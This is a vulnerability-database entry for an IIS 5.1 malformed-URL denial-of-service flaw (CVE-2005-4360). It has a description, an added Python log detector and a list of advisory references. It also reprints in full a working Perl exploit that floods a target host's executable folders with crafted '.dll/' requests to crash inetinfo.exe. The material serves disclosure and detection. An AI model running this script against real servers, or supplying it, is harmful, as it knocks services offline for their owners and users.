Microsoft IIS 5.1 Remote Buffer Overflow Vulnerability

Vulnerability ID 1109518 Vulnerability type Input validation
Published 2005-12-19 Updated 2007-07-13
CVE ID CVE-2005-4360 CNNVD-ID CNNVD-200512-423
Platform Windows CVSS score 7.8
|Vulnerability sources
https://www.exploit-db.com/exploits/1377
https://www.securityfocus.com/bid/15921
https://cxsecurity.com/issue/WLB-2005120051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-423
|Vulnerability details
Microsoft IIS is the web server bundled with Microsoft Windows; it provides, among other things, an HTTP service. Microsoft IIS mishandles certain malformed HTTP requests, and a remote attacker can exploit this to mount a denial-of-service attack against the server. The attacker needs nothing more than a web browser: a specially crafted HTTP request, sent anonymously, crashes the IIS service process inetinfo.exe. The flaw is only reachable through a folder whose "Execute Permissions" are set to "Scripts and Executables"; vulnerable virtual folders include "/_vti_bin" and others with that setting. The malicious request may also trigger a buffer overflow, leading to arbitrary code execution on the affected system.
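The exploit below only sends the probe; it does not show what the request looks like from the server side. The following Python detector, added here as an example and not part of the original page or the exploit author's code, flags requests of the shape the exploit generates (an executable folder, then ".dll/", then one of ASCII 1-31 or ? " * : < >, then "/~digit") in IIS W3C extended log lines. The log field layout, the sample log lines and the EXEC_DIRS list (taken from the exploit's own header comment) are assumptions made for the example; the 500 status codes in the sample are constructed, not observed behaviour.

```python
import re
from urllib.parse import unquote

# Virtual directories the exploit's header comment lists as typical executable
# folders (assumption: your server's list may differ; check each folder's
# "Execute Permissions" setting rather than trusting this list).
EXEC_DIRS = ("/_vti_bin/", "/_sharepoint/", "/scripts/", "/cgi-bin/", "/msadc/", "/iisadmpwd/")

# The character set the exploit randomises into the URL: ASCII 1-31 plus ? " * : < >
BAD_CHARS = frozenset(chr(c) for c in range(1, 32)) | frozenset('?"*:<>')

# ".dll/" followed by a single character, as in /_vti_bin/.dll/*/~0
DLL_PROBE = re.compile(r"\.dll/(.)", re.IGNORECASE | re.DOTALL)


def classify_request(uri):
    """Return a dict describing the probe if uri matches the malformed .dll pattern, else None.

    The URI is percent-decoded first because the bad character may arrive encoded
    (e.g. %1f) or raw, as the Perl exploit sends it.
    """
    decoded = unquote(uri)
    for m in DLL_PROBE.finditer(decoded):
        bad = m.group(1)
        if bad in BAD_CHARS:
            lowered = decoded.lower()
            exec_dir = next((d for d in EXEC_DIRS if lowered.startswith(d)), None)
            return {"uri": decoded, "bad_char": bad, "exec_dir": exec_dir}
    return None


def parse_w3c_line(line):
    """Parse one IIS W3C extended log line with the fixed field set used in SAMPLE_LOG
    (assumed layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)."""
    parts = line.split(" ")
    if len(parts) != 7:
        return None
    _date, _time, client_ip, method, stem, query, status = parts
    # A "?" probe is split by the logger into cs-uri-stem and cs-uri-query; rejoin
    # it so the classifier sees the character the client actually sent.
    uri = stem if query == "-" else stem + "?" + query
    return {"ip": client_ip, "method": method, "uri": uri,
            "status": int(status) if status.isdigit() else None}


def scan_log(text):
    """Return one hit per log line whose request matches the probe pattern."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        hit = classify_request(rec["uri"])
        if hit is not None:
            hit.update(ip=rec["ip"], status=rec["status"])
            hits.append(hit)
    return hits


# Constructed sample log (not from the original page): three probes interleaved with
# legitimate traffic, including a normal FrontPage shtml.dll call that must not be flagged.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.1
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-12-19 10:00:01 192.0.2.10 GET /default.htm - 200
2005-12-19 10:00:02 192.0.2.10 GET /_vti_bin/.dll/*/~3 - 500
2005-12-19 10:00:03 192.0.2.10 GET /_vti_bin/.dll/ /~7 500
2005-12-19 10:00:04 192.0.2.10 GET /scripts/.dll/%1f/~0 - 500
2005-12-19 10:00:05 198.51.100.7 GET /_vti_bin/shtml.dll/index.htm - 200
2005-12-19 10:00:06 198.51.100.7 GET /images/logo.dll/x/~1 - 404
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ip']} -> {h['uri']!r} bad_char={h['bad_char']!r} exec_dir={h['exec_dir']}")
```

Two details matter in practice. First, the "?" variant of the probe never appears intact in cs-uri-stem, because the logger treats it as the query separator; the parser rejoins stem and query before matching, otherwise that variant is missed. Second, a hit whose exec_dir is None is still worth a look: the advisory's precondition is the folder's "Scripts and Executables" setting, not its name, so a request under an unlisted folder tells you to go and check that folder's permissions.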
|Vulnerability EXP
#!/usr/bin/perl
# _really_ bored kokanin / IIS 5.1 dos thing, Inge says to use a browser at 
# http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
# kokanin not like puny browser!!"#1 I hoped Inge was a leet haxx0r ch1ck, but it's
# apparently a dude, bummer. According to Inge passing a kinda malformed url to
# an executable dir a few times makes inetinfo.exe crap out. Yum, monday. This
# script has insanely elite randomization of the url, it even amazes me.
# Hello ilja, ptp people, others, see you at ccc and stuff.

# sample executable dirs: /_vti_bin/ /_sharepoint/ /scripts/ /cgi-bin/ /msadc/ /iisadmpwd/
# sample malformed url: http://www.example.xom/_vti_bin/.dll/*\~0
# sample run: ./this-crap.pl <www.host.bla> </executable_folder/> <count> 
# count should be 4 according to inge, do more!!!!1one MILLIONS I SAY!!! 

use strict;
use warnings;
use List::Util 'shuffle';
use IO::Socket::INET;

my ($target, $folder, $amount) = @ARGV;
die "usage: $0 <host> </executable_folder/> <count>\n"
    unless defined $target && defined $folder && defined $amount;

# construct an array of the reportedly bad characters: ASCII 1-31 ...
my @badchars = map { chr } 1..31;
# ... plus the reserved characters IIS rejects in a path component
push @badchars, "?", "\"", "*", ":", "<", ">";

# main iteration thingie: one malformed request per connection
for my $i (1..$amount){
    # shuffle the array so $shuffled[0] is a random bad character
    my @shuffled = shuffle(@badchars);
    # this is the request: <folder>.dll/<bad char>/~<digit>
    my $malformed = $folder . ".dll/" . $shuffled[0] . "/~" . int rand(9);
    # this is informative text
    print "[$i]\t greeting $target with: " . $malformed . "\n";
    # create the socket
    my $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $target,
        PeerPort => "80",
    );
    # error reporting: a refused connection usually means an earlier request already took inetinfo.exe down
    die "unable to connect to $target ($!) - omgomgwtf itz dead w00t w00t \n" unless $socket;
    # the actual data transmission: a raw HTTP/1.0 GET, the bad character is sent unencoded
    print $socket "GET " . $malformed . " HTTP/1.0\r\n" . "Host: $target\r\n" . "\r\n\r\n";
    # all done
    close $socket;
}

# milw0rm.com [2005-12-19]
|Affected products
Microsoft IIS 5.1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsof
|References

Source: US-CERT Technical Alert
Name: TA07-191A
Link: http://www.us-cert.gov/cas/techalerts/TA07-191A.html
Source: BID
Name: 15921
Link: http://www.securityfocus.com/bid/15921
Source: BUGTRAQ
Name: 20051216 Microsoft IIS Remote Denial of Service (DoS) .DLL Url exploit
Link: http://www.securityfocus.com/archive/1/archive/1/419707/100/0/threaded
Source: OSVDB
Name: 21805
Link: http://www.osvdb.org/21805
Source: MS
Name: MS07-041
Link: http://www.microsoft.com/technet/security/Bulletin/ms07-041.mspx
Source: VUPEN
Name: ADV-2005-2963
Link: http://www.frsirt.com/english/advisories/2005/2963
Source: SECTRACK
Name: 1015376
Link: http://securitytracker.com/alerts/2005/Dec/1015376.html
Source: SREASON
Name: 271
Link: http://securityreason.com/securityalert/271
Source: SECUNIA
Name: 18106
Link: http://secunia.com/advisories/18106
Source: MISC
Link: http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
Source: HP
Name: SSRT071446
Link: http://archive.cert.uni-stuttgart.de/bugtraq/2007/07/msg00254.html
Source: US Government Resource
Name: oval:org.mitre.oval:def:1703
Link: http://oval.mitre.org/repository/data/